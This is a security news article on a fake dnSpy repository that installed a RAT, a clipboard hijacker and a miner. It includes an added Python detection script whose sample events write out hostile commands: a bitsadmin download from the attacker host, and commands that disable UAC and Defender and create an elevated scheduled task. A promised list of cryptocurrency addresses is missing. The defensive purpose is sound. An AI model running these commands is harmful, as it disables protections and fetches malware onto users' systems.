Cybersecurity Researchers and Developers Targeted in a Malicious Campaign Spreading dnSpy
Cyberattacks Leveraging Fake dnSpy Delivered a Cocktail of Malware.
Last updated on January 10, 2022
A malware campaign distributing a malicious variant of the dnSpy app was wreaking havoc last week, targeting developers and cybersecurity researchers. The threat actors’ goal was to install cryptocurrency stealers, RATs, and miners on victims’ machines.
Last week, a threat actor created a GitHub repository containing a dnSpy variant that deploys a cocktail of malware: clipboard hijackers, a Quasar RAT, various other payloads, and a miner. The clipboard hijackers are used to steal cryptocurrency.
When the malicious dnSpy app is launched, it executes a series of commands that eventually create scheduled tasks, and these tasks run with elevated permissions.
Researchers from MalwareHunterTeam shared with the publication that reported the campaign a list of the commands, which shows what the malware does: it disables Microsoft Defender, downloads curl.exe to %windir%\system32\curl.exe by means of bitsadmin.exe, then uses those two executables to download a variety of payloads into the C:\Trash folder and launches them. Finally, it disables User Account Control.
The payloads were downloaded from http://4api[.]net/ and consist of the following files:
- %windir%\system32\curl.exe
- C:\Trash\c.exe – Unknown [VirusTotal]
- C:\Trash\ck.exe – Unknown
- C:\Trash\cbot.exe – Clipboard Hijacker [VirusTotal]
- C:\Trash\cbo.exe – Unknown [VirusTotal]
- C:\Trash\qs.exe – Quasar RAT [VirusTotal]
- C:\Trash\m.exe – Miner [VirusTotal]
- C:\Trash\d.exe
- C:\Trash\nnj.exe – Unknown
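The behaviour chain described above (a shell spawned by dnSpy, bitsadmin fetching curl.exe into system32, payloads run from C:\Trash, an elevated scheduled task, Defender and UAC switched off) is what a detection engineer would want to catch in process-creation telemetry. The script below is an added example, not code from the article or from MalwareHunterTeam; it runs a handful of rules over constructed Sysmon-style process-creation records. The field names, timestamps and exact command lines in the sample events are assumptions made for the example, and the rule that legitimate dnSpy never spawns a shell is likewise an assumption used as a heuristic.

```python
"""Detection rules for the dnSpy-campaign behaviour chain (added example)."""
import json
import re

# Constructed sample telemetry, loosely shaped like Sysmon Event ID 1 fields.
# Paths mirror the ones the article reports; everything else is made up.
SAMPLE_EVENTS = [
    {"ts": "2022-01-07T10:01:02Z", "image": r"C:\Users\re\Downloads\dnSpy\dnSpy.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "dnSpy.exe"},
    {"ts": "2022-01-07T10:01:03Z", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\re\Downloads\dnSpy\dnSpy.exe", "cmdline": "cmd.exe /c start.bat"},
    {"ts": "2022-01-07T10:01:04Z", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin /transfer job hxxp://4api[.]net/curl.exe C:\Windows\system32\curl.exe"},
    {"ts": "2022-01-07T10:01:05Z", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"schtasks /create /tn Update /tr C:\Trash\qs.exe /sc onlogon /rl highest"},
    {"ts": "2022-01-07T10:01:06Z", "image": r"C:\Windows\System32\reg.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"ts": "2022-01-07T10:01:07Z", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2022-01-07T10:01:08Z", "image": r"C:\Trash\qs.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "qs.exe"},
    # Benign noise that must not fire any rule.
    {"ts": "2022-01-07T10:02:00Z", "image": r"C:\Program Files\Git\cmd\git.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "git pull"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def load_events(jsonl_text):
    """Parse one JSON object per line, skipping blank lines."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def _f(ev, key):
    """Lower-cased field accessor so rules are case-insensitive."""
    return str(ev.get(key, "")).lower()


# Each rule maps one stage of the chain the article describes to a predicate.
RULES = [
    # Assumption: a legitimate dnSpy session has no reason to spawn a shell.
    ("dnspy_spawns_shell", lambda ev: _f(ev, "parent").endswith("\\dnspy.exe")
        and _f(ev, "image").rsplit("\\", 1)[-1] in ("cmd.exe", "powershell.exe")),
    # bitsadmin used as a LOLBin to drop curl.exe into the system directory.
    ("bitsadmin_download_to_system32", lambda ev: _f(ev, "image").endswith("\\bitsadmin.exe")
        and "/transfer" in _f(ev, "cmdline") and "\\system32\\curl.exe" in _f(ev, "cmdline")),
    # Anything executing out of the C:\Trash staging folder.
    ("process_launched_from_c_trash", lambda ev: _f(ev, "image").startswith("c:\\trash\\")),
    # Scheduled task created to run at the highest privilege level.
    ("scheduled_task_highest_runlevel", lambda ev: _f(ev, "image").endswith("\\schtasks.exe")
        and "/create" in _f(ev, "cmdline") and "/rl highest" in _f(ev, "cmdline")),
    # UAC turned off via EnableLUA = 0.
    ("uac_disabled_enablelua", lambda ev: "enablelua" in _f(ev, "cmdline")
        and bool(re.search(r"/d\s+0\b", _f(ev, "cmdline")))),
    # Defender real-time protection or the service itself disabled.
    ("defender_tampering", lambda ev: any(
        m in _f(ev, "cmdline") for m in ("disableantispyware", "disablerealtimemonitoring"))),
]


def detect(events):
    """Return one finding per (event, rule) match."""
    findings = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev):
                findings.append({"rule": name, "ts": ev.get("ts"), "image": ev.get("image")})
    return findings


def summarize(findings, min_stages=3):
    """Collapse findings into distinct stages; several stages on one host is the chain, not noise."""
    stages = sorted({f["rule"] for f in findings})
    return {"stages": stages, "likely_chain": len(stages) >= min_stages}


if __name__ == "__main__":
    hits = detect(load_events(SAMPLE_JSONL))
    for h in hits:
        print(f'{h["ts"]}  {h["rule"]:34}  {h["image"]}')
    print(summarize(hits))
```

Each rule on its own is noisy (an administrator may legitimately create an elevated task), which is why `summarize` only calls the chain when several distinct stages appear together; in a real pipeline the grouping would be per host and per time window rather than over the whole input.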
What is worth mentioning about the clipboard hijacker (cbot.exe) is that it reuses cryptocurrency addresses seen in past cyberattacks. These are:
The GitHub repository and the dnSpy[.]net domain used in this campaign have been shut down for the moment. Nevertheless, the risk that other popular projects will be cloned in the same way remains.
What Is dnSpy?
dnSpy is a well-known .NET assembly editor and debugger used to modify, debug, and decompile .NET programs. It is widely used by cybersecurity researchers when inspecting .NET malware.
Hi! My name is Andra and I am a passionate writer interested in a variety of topics. I am curious about the cybersecurity world and what I want to achieve through what I write is to keep you curious too!